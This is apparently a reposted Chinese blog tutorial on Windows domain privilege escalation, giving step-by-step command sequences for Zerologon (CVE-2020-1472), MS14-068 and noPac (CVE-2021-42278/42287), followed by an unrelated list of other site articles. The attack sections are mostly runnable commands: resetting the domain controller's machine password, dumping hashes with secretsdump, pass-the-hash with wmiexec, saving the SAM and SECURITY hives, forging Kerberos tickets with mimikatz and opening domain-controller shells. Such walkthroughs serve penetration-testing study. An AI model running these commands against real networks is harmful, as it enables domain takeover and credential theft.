域環境提權

域內提權漏洞(1)

Netlogon域權限提升

1.查看域控主機名稱

net group "domain controllers" /domain

2.檢測漏洞是否存在

https://github.com/SecuraBV/CVE-2020-1472.git
python zerologon_tester.py OWA 192.168.52.138
?

3.漏洞利用,對域賬號重置

https://github.com/blackarrowsec/redteam-research
python CVE-2020-1472.py DC DC$ 192.168.247.142

?
這時候可以mimikatz看一下用戶憑證,DC$的hash已被置空

4.獲取域控用戶hash

python secretsdump.py 'god.org/OWA$@192.168.52.138' -no-pass
這里圖放錯了 DC$就是OWA$

5. wmiexec進行hash橫向連接

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:484c4a877bf92ab233572af847b9e530 demo\Administrator@192.168.52.138

6. 恢復域 - 獲取hash

#獲取sam數據庫
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save

6. 恢復域 - 獲取hash

#解密sam
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

6. 恢復域 - 還原hash

https://github.com/risksense/zerologon
python?reinstall_original_pw.py OWA?192.168.5.134 e2474b7ca001fb4d6847a6c1ece68bfb

域內提權漏洞(2)

MS14-068
該漏洞可能允許攻擊者將未經授權的域用戶賬戶的權限,提權到域管理員的權限。
微軟官方解釋:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068
漏洞原理:
Kerberos認證原理: https://www.cnblogs.com/huamingao/p/7267423.html
服務票據是客戶端直接發送給服務器,并請求服務資源的。如果服務器沒有向域控dc驗證pac的話,那么客戶端可以偽造域管的權限來訪問服務器。

漏洞利用前提:

1.域控沒有打MS14-068的補丁(KB3011780)
2.攻擊者拿下了一臺域內的普通計算機,并獲得普通域用戶以及密碼/hash值,以及用戶的suid
相關工具下載:
Ms14-068.exe 下載地址: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
PSexec下載地址: https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe

漏洞利用

1.首先在檢測是否有MS14-068這個漏洞,通過查看是否打補丁(KB3011780)來判斷是否存在漏洞,在域中補丁都是批量安裝

2. 獲取域sid

S-1-5-21-2756371121-2868759905-3853650604-1001

3. 獲取域hash

由于是域普通用戶,首先提權到system然后抓hash
161cff084477fe596a5db81874498a24

4. 清除當前用戶票據

mimikatz kerberos::purge

5.利用ms14-068.exe提權工具生成偽造的kerberos協議認證證書

shell MS14-068.exe -u de1ay@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-1001 -p
1qaz@WSX -d 10.10.10.10

6.利用mimikatz.exe將證書寫入,從而提升為域管理員

mimikatz kerberos::ptc TGT_11@de1ay.com.ccache 7.再次列出域控制器的C盤目錄,成功訪問域控的C盤,說明普通域用戶提權成功

域內提權漏洞(3)

cve-2021-42287/cve-2021-42278

漏洞介紹

1、CVE-2021-42278
一般來說,機器賬號的名字應該以$符號結尾的。例如DC$表示DC這臺主機的賬戶名。但是微軟只是進行了規定,并沒有驗證程序對用戶創建的用戶名進行驗證,也就是說,創建DC用戶名完全是可以的。(這里指的是機器賬號的sAMAccountName屬性)
2、CVE-2021-42287
結合上面那個漏洞,如果創建了一個用戶名為DC的賬戶,此時使用這個賬戶去申請一張TGT票據,然后在申請ST之前,將這個賬戶名修改掉或者刪除掉,那么在進行申請ST的時候,KDC在進行驗證時就查不到這個賬戶,此時KDC就會去查找DC$這個賬戶,如果這個賬戶存在的話,最終返回的就是DC$這個賬戶申請的ST。也就相當于獲取到了域控賬戶申請的高權限服務票據。

漏洞影響范圍

Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019

漏洞利用

1.需要一個域用戶

2.獲取dc shell

python3 sam_the_admin.py x.x/x:x -dc-ip x.x.x.x -shell

3.檢查漏洞是否存在

.\noPac.exe scan -domain x.x.x -user x -pass 'x'

4.獲取shell

python3 noPac.py -use-ldap de1ay.com/de1ay:1qaz@WSX -dc-ip 10.10.10.10 -shell

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/39989.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/39989.shtml
英文地址,請注明出處:http://en.pswp.cn/web/39989.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

《簡歷寶典》01 - 一文帶你學會如何寫一份糟糕透頂的簡歷

《簡歷寶典》01 - 一文帶你學會如何寫一份糟糕透頂的簡歷

我們每個人幾乎都會面對找工作這件事,而找工作或者說求職首先就是要寫一份簡歷。今天狗哥將以一個不同的視角帶你寫一份無與倫比,糟糕透頂的求職簡歷,說實話,其實幾年前,我就是這么寫的。 目錄 1. 文件名 2. 基本信…
閱讀更多...
【項目管理】項目風險管理(Word原件)

【項目管理】項目風險管理(Word原件)

風險和機會管理就是在一個項目開發過程中對風險進行識別、跟蹤、控制的手段。風險和機會管理提供了對可能出現的風險進行持續評估,確定重要的風險機會以及實施處理的策略的一種規范化的環境。包括識別、分析、制定處理和減緩行動、跟蹤 。合理的風險和機會管理應盡力…
閱讀更多...
白騎士的Python教學進階篇 2.4 高級數據結構

白騎士的Python教學進階篇 2.4 高級數據結構

系列目錄 上一篇:白騎士的Python教學進階篇 2.3 文件操作??????? 在Python中,掌握高級數據結構可以顯著提升你的編程效率和代碼可讀性。高級數據結構包括列表推導式、生成器與迭代器以及裝飾器。本文將詳細介紹這些高級數據結構,幫助…
閱讀更多...
算法刷題1-10大排序算法匯總

算法刷題1-10大排序算法匯總

十種常見排序算法可以分為兩大類: 比較類排序:通過比較來決定元素間的相對次序,由于其時間復雜度不能突破O(nlogn),因此也稱為非線性時間比較類排序。非比較類排序:不通過比較來決定元素間的相對次序,它可…
閱讀更多...
服務器安裝Nginx教程

服務器安裝Nginx教程

1、安裝所需依賴 yum -y install gcc gcc-c make libtool zlib zlib-devel openssl openssl-devel pcre pcre-devel 2、創建nginx目錄并下載Nginx安裝包 //進入/usr/local cd /usr/local//創建nginx目錄 mkdir nginx//進入nginx目錄 cd nginx//下載nginx tar包 wget http://…
閱讀更多...
Lesson 47 A cup of coffee

Lesson 47 A cup of coffee

Lesson 47 A cup of coffee 詞匯 like v. 喜歡,想要 用法:like 物品 / 人 喜歡……    like 動詞ing 喜歡做……(習慣性)    like to 動詞原形 喜歡做……(一次性) 例句:我喜歡小狗…
閱讀更多...
[leetcode hot 150]第五百三十題,二叉搜索樹的最小絕對差

[leetcode hot 150]第五百三十題,二叉搜索樹的最小絕對差

題目: 給你一個二叉搜索樹的根節點 root ,返回 樹中任意兩不同節點值之間的最小差值 。 差值是一個正數,其數值等于兩值之差的絕對值。 解析: minDiffInBST 方法是主要方法。創建一個 ArrayList 來存儲樹的節點值。inorderTrave…
閱讀更多...
前端日常掃盲

前端日常掃盲

一、js標簽語句 直接上代碼 for(let i 0; i < 10; i){console.log("頂層循環");for(let j 0; j < 10; j){console.log("內層循環",i,j);if(i * j > 30){console.log("退出頂層循環");break;}} }如上面的代碼&#xff0c;雙層循環&a…
閱讀更多...
opencv-yolo-tiny車輛檢測 ----20240705

opencv-yolo-tiny車輛檢測 ----20240705

opencv-yolo-tiny 實現車輛檢測 opencv.dnn模塊已經支持大部分格式的深度學習模型推理,該模塊可以直接加載tensorflow、darknet、pytorch等常見深度學習框架訓練出來的模型,并運行推理得到模型輸出結果。opecnv.dnn模塊已經作為一種模型部署方式,應用在工業落地實際場景中。…
閱讀更多...
持續交付:自動化測試與發布流程的變革

持續交付:自動化測試與發布流程的變革

目錄 前言1. 持續交付的概念1.1 持續交付的定義1.2 持續交付的核心原則 2. 持續交付的優勢2.1 提高交付速度2.2 提高軟件質量2.3 降低發布風險2.4 提高團隊協作 3. 實施持續交付的步驟3.1 構建自動化測試體系3.1.1 單元測試3.1.2 集成測試3.1.3 功能測試3.1.4 性能測試 3.2 構建…
閱讀更多...
(一)進程與線程

(一)進程與線程

一、進程和線程的概念 1.1 進程 程序由指令和數據組成&#xff0c;但這些指令要運行&#xff0c;數據要讀寫&#xff0c;就必須將指令加載至CPU&#xff0c;數據加載至內存。在指令運行過程中還需要用到磁盤、網絡等設備。進程就是用來加載指令、管理內存、管理 IO 的。當一個…
閱讀更多...
鴻蒙系統的開發與學習

鴻蒙系統的開發與學習

1.開發工具的下載 DevEco Studio-HarmonyOS Next Beta版-華為開發者聯盟 安裝、環境配置時&#xff0c;建議 自定義目錄 注意&#xff1a;路徑中不要有 中文、特殊字符。 2.ArkTS基礎總結 1&#xff09;三種數據類型 ① string 字符串&#xff1a;描述信息 ② number 數…
閱讀更多...
銀聯快捷支付的優點!

銀聯快捷支付的優點!

快速支付&#xff0c;又稱電子支付或第三方支付&#xff0c;在行業中得到了廣泛的應用。用戶只需通過銀行完成交易。方便快捷是指銀行可以在任何條件下支持用戶之間的轉賬、支付等即時結算服務。快速支付是指用戶可以通過手機實現銀行卡等相關操作。然而&#xff0c;現在大多數…
閱讀更多...
Java后端每日面試題(day1)

Java后端每日面試題(day1)

目錄 JavaWeb三大組件依賴注入的方式Autowire和Resurce有什么區別&#xff1f;Spring Boot的優點Spring IoC是什么&#xff1f;說說Spring Aop的優點Component和Bean的區別自定義注解時使用的RetentionPolicy枚舉類有哪些值&#xff1f;如何理解Spring的SPI機制&#xff1f;Spr…
閱讀更多...
聽說現在AI產品經理薪資30k起步?0基礎可以轉行AI產品嗎?

聽說現在AI產品經理薪資30k起步?0基礎可以轉行AI產品嗎?

2024年&#xff0c;還有什么新風口&#xff1f; AI、元宇宙、NFT… 很多人不知道&#xff0c;其實不管是元宇宙還是NFT&#xff0c;它們本質上就是人工智能領域。 AI自身應用領域非常廣泛&#xff0c;大批高薪崗位隨之涌了出來&#xff0c;包括AI產品經理。 AI產品經歷具體工…
閱讀更多...
CSS Float(浮動)

CSS Float(浮動)

CSS Float(浮動) 概述 CSS Float(浮動)是一種布局技術,它允許開發人員將元素(如圖片或文本)沿著其容器的左側或右側放置,并且讓其他內容圍繞它流動。這種技術在過去被廣泛用于創建多欄布局,盡管現代CSS提供了更多高級的布局方法(如Flexbox和Grid),但理解浮動仍然…
閱讀更多...
【LeetCode:841. 鑰匙和房間 + DFS】

【LeetCode:841. 鑰匙和房間 + DFS】

&#x1f680; 算法題 &#x1f680; &#x1f332; 算法刷題專欄 | 面試必備算法 | 面試高頻算法 &#x1f340; &#x1f332; 越難的東西,越要努力堅持&#xff0c;因為它具有很高的價值&#xff0c;算法就是這樣? &#x1f332; 作者簡介&#xff1a;碩風和煒&#xff0c;…
閱讀更多...
安卓手機已刪除短信如何恢復?這2個技巧,找回離家出走的短信

安卓手機已刪除短信如何恢復?這2個技巧,找回離家出走的短信

手機宛如一座豐富的寶庫&#xff0c;珍藏著生活中的點滴回憶。其中&#xff0c;短信作為溝通的橋梁&#xff0c;記錄著我們與親朋好友間的溫情脈脈&#xff0c;承載著無數珍貴的瞬間。然而&#xff0c;有時&#xff0c;我們卻會不慎觸發寶庫中的機關&#xff0c;使得這些寶貴的…
閱讀更多...
陳文自媒體:30歲房貸1000萬,杠杠超乎想象!

陳文自媒體:30歲房貸1000萬,杠杠超乎想象!

首先寫這個文章我要聲明&#xff0c;這個內容沒有傳播負能量&#xff0c;沒有傳播所謂的焦慮&#xff0c;我只是想表達一下我的觀點。 昨天的中金30歲女士的事件&#xff0c;我相信很多網友都知道了&#xff0c;已經上了熱搜了。 簡單總結一下原因&#xff0c;據說是她和老公…
閱讀更多...
【計算智能】遺傳算法(二):基本遺傳算法在優化問題中的應用【實驗】

【計算智能】遺傳算法(二):基本遺傳算法在優化問題中的應用【實驗】

前言 本系列文章架構概覽&#xff1a; 本文將介紹基本遺傳算法在解決優化問題中的應用,通過實驗展示其基本原理和實現過程&#xff1a;選取一個簡單的二次函數作為優化目標&#xff0c;并利用基本遺傳算法尋找其在指定范圍內的最大值。 2. 基本遺傳算法&#xff08;SGA&#x…
閱讀更多...
最新文章

Copyright @ 2022~2023